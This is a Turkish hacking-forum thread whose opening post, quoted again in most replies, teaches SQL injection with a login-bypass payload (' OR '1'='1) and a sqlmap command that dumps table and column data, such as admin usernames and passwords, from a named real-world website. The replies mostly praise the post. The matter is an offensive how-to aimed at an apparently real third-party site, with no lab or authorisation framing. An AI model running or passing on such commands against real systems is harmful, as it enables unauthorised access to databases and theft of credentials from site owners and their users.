SQL İnjection Manuel Komutlar Part - 1

Clen1x_

Clen1x_

Anka Team Junior
16 Kas 2023
64
1
22
OneDrive

SQL İnjection ; SQL enjeksiyonu veri tabanından yapılan sorgulama işlemini hedef alan bir saldırı şeklidir. Bu saldırı şeklinde sorgulama dili yapısı kullanılarak saldırı gerçekleştirilir. Bir web uygulamasının kullanıcı adı ve şifre ikilisi veri tabanına ( URL VERİSİ ) “SELECT * FROM TABLE_PERSONEL WHERE username = '" + kullanıcı adı + "' AND password= '" +şifre+ "'” şeklinde gönderildiğinde (“ ”) işaretleri içindeki veri bir filtrelemeye tabi tutulmazsa kullanıcının buraya yazacağı ( OR ''1= ) eklinde bir ifade sorguyu “SELECT * FROM TABLE_PERSONEL 6 WHERE username = '' OR ''1=1'' AND Password = '' OR ''1=1''” haline getirir. Bu durumda sorgudan var olan bütün kayıtlar dönecektir veya bypass kodlar PASS:TURKHACKTEAM kullanarak admin panelde kullanıcı adı kısmına yazıp şifreye ne yazarsak yazalım giriş sağlamamıza yarayacaktır.

KALİ ÜZERİNDEN SQLMAP İLE DB DUMP;

Kod: 
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump

Bu şekilde önce sql map ile manuel taratabilirsiniz ki tavsiyem budur,Eğer uğraşmak istemiyorsanız kaliyi de kullanabilirsiniz tabii ama naçizane tavsiyem kendinizi manuel tarama için geliştirmenizdir çünkü ileride kaliden daha hızlı davranmanızı sağlayacak.

SQLMAP COLUMNS TABLES ÖRNEĞİ BUNUN DATABASE VERSİYONUNU DÜŞÜNEBİLİRSİNİZ!

h1xtcoj.png

MANUEL SQL İNJECTİON ÖRNEĞİ :​

g2oj29y.png


NOT: PART 2 DE HTML İNJECTİON VAR





p6j0ie1.png
 
Son düzenleme:
'PİON

'PİON

Ar-Ge Ekibi Asistanı
16 Ocak 2023
195
1
115
Londra
Clen1x_' Alıntı:

SQL İnjection ; SQL enjeksiyonu veri tabanından yapılan sorgulama işlemini hedef alan bir saldırı şeklidir. Bu saldırı şeklinde sorgulama dili yapısı kullanılarak saldırı gerçekleştirilir. Bir web uygulamasının kullanıcı adı ve şifre ikilisi veri tabanına ( URL VERİSİ ) “SELECT * FROM TABLE_PERSONEL WHERE username = '" + kullanıcı adı + "' AND password= '" +şifre+ "'” şeklinde gönderildiğinde (“ ”) işaretleri içindeki veri bir filtrelemeye tabi tutulmazsa kullanıcının buraya yazacağı ( OR ''1= ) eklinde bir ifade sorguyu “SELECT * FROM TABLE_PERSONEL 6 WHERE username = '' OR ''1=1'' AND Password = '' OR ''1=1''” haline getirir. Bu durumda sorgudan var olan bütün kayıtlar dönecektir veya bypass kodlar PASS:TURKHACKTEAM kullanarak admin panelde kullanıcı adı kısmına yazıp şifreye ne yazarsak yazalım giriş sağlamamıza yarayacaktır.

KALİ ÜZERİNDEN SQLMAP İLE DB DUMP;

Kod: 
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump

Bu şekilde önce sql map ile manuel taratabilirsiniz ki tavsiyem budur,Eğer uğraşmak istemiyorsanız kaliyi de kullanabilirsiniz tabii ama naçizane tavsiyem kendinizi manuel tarama için geliştirmenizdir çünkü ileride kaliden daha hızlı davranmanızı sağlayacak.

SQLMAP COLUMNS TABLES ÖRNEĞİ BUNUN DATABASE VERSİYONUNU DÜŞÜNEBİLİRSİNİZ!

h1xtcoj.png

MANUEL SQL İNJECTİON ÖRNEĞİ :​

g2oj29y.png







p6j0ie1.png
Genişletmek için tıkla ...
Eline sağlık
 
zeores

zeores

Üye
23 Haz 2021
105
27
Arch Linux
Clen1x_' Alıntı:

SQL İnjection ; SQL enjeksiyonu veri tabanından yapılan sorgulama işlemini hedef alan bir saldırı şeklidir. Bu saldırı şeklinde sorgulama dili yapısı kullanılarak saldırı gerçekleştirilir. Bir web uygulamasının kullanıcı adı ve şifre ikilisi veri tabanına ( URL VERİSİ ) “SELECT * FROM TABLE_PERSONEL WHERE username = '" + kullanıcı adı + "' AND password= '" +şifre+ "'” şeklinde gönderildiğinde (“ ”) işaretleri içindeki veri bir filtrelemeye tabi tutulmazsa kullanıcının buraya yazacağı ( OR ''1= ) eklinde bir ifade sorguyu “SELECT * FROM TABLE_PERSONEL 6 WHERE username = '' OR ''1=1'' AND Password = '' OR ''1=1''” haline getirir. Bu durumda sorgudan var olan bütün kayıtlar dönecektir veya bypass kodlar PASS:TURKHACKTEAM kullanarak admin panelde kullanıcı adı kısmına yazıp şifreye ne yazarsak yazalım giriş sağlamamıza yarayacaktır.

KALİ ÜZERİNDEN SQLMAP İLE DB DUMP;

Kod: 
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump

Bu şekilde önce sql map ile manuel taratabilirsiniz ki tavsiyem budur,Eğer uğraşmak istemiyorsanız kaliyi de kullanabilirsiniz tabii ama naçizane tavsiyem kendinizi manuel tarama için geliştirmenizdir çünkü ileride kaliden daha hızlı davranmanızı sağlayacak.

SQLMAP COLUMNS TABLES ÖRNEĞİ BUNUN DATABASE VERSİYONUNU DÜŞÜNEBİLİRSİNİZ!

h1xtcoj.png

MANUEL SQL İNJECTİON ÖRNEĞİ :​

g2oj29y.png




p6j0ie1.png
Genişletmek için tıkla ...
Elinize sağlık hocam.
 
'pump

'pump

Uzman üye
9 Ara 2022
1,458
22
3,247
Ağ Kablolarında Geziyor
Dostum başlığa göre konun çok çok eksik, belki 2. konuda yazicaksin, ama 2. konunun uzunluğu da bu kadar olucaksa senin 10000 tane konu açman gerekebilir, seri halinda anlaticaksan, o yuzden biraz daha uzun tutsan ve diger sql çesitlerinin sorgu mantığına değinsen hoş olurdu.
Eline sağlık yinede..
 
Clen1x_

Clen1x_

Anka Team Junior
16 Kas 2023
64
1
22
OneDrive
'pump' Alıntı:
Dostum başlığa göre konun çok çok eksik, belki 2. konuda yazicaksin, ama 2. konunun uzunluğu da bu kadar olucaksa senin 10000 tane konu açman gerekebilir, seri halinda anlaticaksan, o yuzden biraz daha uzun tutsan ve diger sql çesitlerinin sorgu mantığına değinsen hoş olurdu.
Eline sağlık yinede..
Genişletmek için tıkla ...
Teşekkür ederim farkındayım evet, part 2 de biraz daha uzun tutmaya özen gösteririm fakat okuyucuyu yormak istemedim bu nedenle kısa kaldı.
 
NMSHacking

NMSHacking

Üye
4 Haz 2023
230
2
69
Clen1x_' Alıntı:

SQL İnjection ; SQL enjeksiyonu veri tabanından yapılan sorgulama işlemini hedef alan bir saldırı şeklidir. Bu saldırı şeklinde sorgulama dili yapısı kullanılarak saldırı gerçekleştirilir. Bir web uygulamasının kullanıcı adı ve şifre ikilisi veri tabanına ( URL VERİSİ ) “SELECT * FROM TABLE_PERSONEL WHERE username = '" + kullanıcı adı + "' AND password= '" +şifre+ "'” şeklinde gönderildiğinde (“ ”) işaretleri içindeki veri bir filtrelemeye tabi tutulmazsa kullanıcının buraya yazacağı ( OR ''1= ) eklinde bir ifade sorguyu “SELECT * FROM TABLE_PERSONEL 6 WHERE username = '' OR ''1=1'' AND Password = '' OR ''1=1''” haline getirir. Bu durumda sorgudan var olan bütün kayıtlar dönecektir veya bypass kodlar PASS:TURKHACKTEAM kullanarak admin panelde kullanıcı adı kısmına yazıp şifreye ne yazarsak yazalım giriş sağlamamıza yarayacaktır.

KALİ ÜZERİNDEN SQLMAP İLE DB DUMP;

Kod: 
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump

Bu şekilde önce sql map ile manuel taratabilirsiniz ki tavsiyem budur,Eğer uğraşmak istemiyorsanız kaliyi de kullanabilirsiniz tabii ama naçizane tavsiyem kendinizi manuel tarama için geliştirmenizdir çünkü ileride kaliden daha hızlı davranmanızı sağlayacak.

SQLMAP COLUMNS TABLES ÖRNEĞİ BUNUN DATABASE VERSİYONUNU DÜŞÜNEBİLİRSİNİZ!

h1xtcoj.png

MANUEL SQL İNJECTİON ÖRNEĞİ :​

g2oj29y.png


NOT: PART 2 DE HTML İNJECTİON VAR





p6j0ie1.png
Genişletmek için tıkla ...
başlangıç için güzel eline sağlık
 
LydexCoding

LydexCoding

Moderasyon Ekibi Çaylak
24 May 2024
424
4
135
:)
Clen1x_' Alıntı:

SQL İnjection ; SQL enjeksiyonu veri tabanından yapılan sorgulama işlemini hedef alan bir saldırı şeklidir. Bu saldırı şeklinde sorgulama dili yapısı kullanılarak saldırı gerçekleştirilir. Bir web uygulamasının kullanıcı adı ve şifre ikilisi veri tabanına ( URL VERİSİ ) “SELECT * FROM TABLE_PERSONEL WHERE username = '" + kullanıcı adı + "' AND password= '" +şifre+ "'” şeklinde gönderildiğinde (“ ”) işaretleri içindeki veri bir filtrelemeye tabi tutulmazsa kullanıcının buraya yazacağı ( OR ''1= ) eklinde bir ifade sorguyu “SELECT * FROM TABLE_PERSONEL 6 WHERE username = '' OR ''1=1'' AND Password = '' OR ''1=1''” haline getirir. Bu durumda sorgudan var olan bütün kayıtlar dönecektir veya bypass kodlar PASS:TURKHACKTEAM kullanarak admin panelde kullanıcı adı kısmına yazıp şifreye ne yazarsak yazalım giriş sağlamamıza yarayacaktır.

KALİ ÜZERİNDEN SQLMAP İLE DB DUMP;

Kod: 
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump

Bu şekilde önce sql map ile manuel taratabilirsiniz ki tavsiyem budur,Eğer uğraşmak istemiyorsanız kaliyi de kullanabilirsiniz tabii ama naçizane tavsiyem kendinizi manuel tarama için geliştirmenizdir çünkü ileride kaliden daha hızlı davranmanızı sağlayacak.

SQLMAP COLUMNS TABLES ÖRNEĞİ BUNUN DATABASE VERSİYONUNU DÜŞÜNEBİLİRSİNİZ!

h1xtcoj.png

MANUEL SQL İNJECTİON ÖRNEĞİ :​

g2oj29y.png


NOT: PART 2 DE HTML İNJECTİON VAR





p6j0ie1.png
Genişletmek için tıkla ...
Ellerinize sağlık hocam, güzel bir anlatım olmuş.En sondaki görselin boyutunu biraz küçültebilirsiniz :)


olik9xy.png
 
NMSHacking

NMSHacking

Üye
4 Haz 2023
230
2
69
Clen1x_' Alıntı:

SQL İnjection ; SQL enjeksiyonu veri tabanından yapılan sorgulama işlemini hedef alan bir saldırı şeklidir. Bu saldırı şeklinde sorgulama dili yapısı kullanılarak saldırı gerçekleştirilir. Bir web uygulamasının kullanıcı adı ve şifre ikilisi veri tabanına ( URL VERİSİ ) “SELECT * FROM TABLE_PERSONEL WHERE username = '" + kullanıcı adı + "' AND password= '" +şifre+ "'” şeklinde gönderildiğinde (“ ”) işaretleri içindeki veri bir filtrelemeye tabi tutulmazsa kullanıcının buraya yazacağı ( OR ''1= ) eklinde bir ifade sorguyu “SELECT * FROM TABLE_PERSONEL 6 WHERE username = '' OR ''1=1'' AND Password = '' OR ''1=1''” haline getirir. Bu durumda sorgudan var olan bütün kayıtlar dönecektir veya bypass kodlar PASS:TURKHACKTEAM kullanarak admin panelde kullanıcı adı kısmına yazıp şifreye ne yazarsak yazalım giriş sağlamamıza yarayacaktır.

KALİ ÜZERİNDEN SQLMAP İLE DB DUMP;

Kod: 
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump

Bu şekilde önce sql map ile manuel taratabilirsiniz ki tavsiyem budur,Eğer uğraşmak istemiyorsanız kaliyi de kullanabilirsiniz tabii ama naçizane tavsiyem kendinizi manuel tarama için geliştirmenizdir çünkü ileride kaliden daha hızlı davranmanızı sağlayacak.

SQLMAP COLUMNS TABLES ÖRNEĞİ BUNUN DATABASE VERSİYONUNU DÜŞÜNEBİLİRSİNİZ!

h1xtcoj.png

MANUEL SQL İNJECTİON ÖRNEĞİ :​

g2oj29y.png


NOT: PART 2 DE HTML İNJECTİON VAR





p6j0ie1.png
Genişletmek için tıkla ...
resim biraz büyük olmuş hocam
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.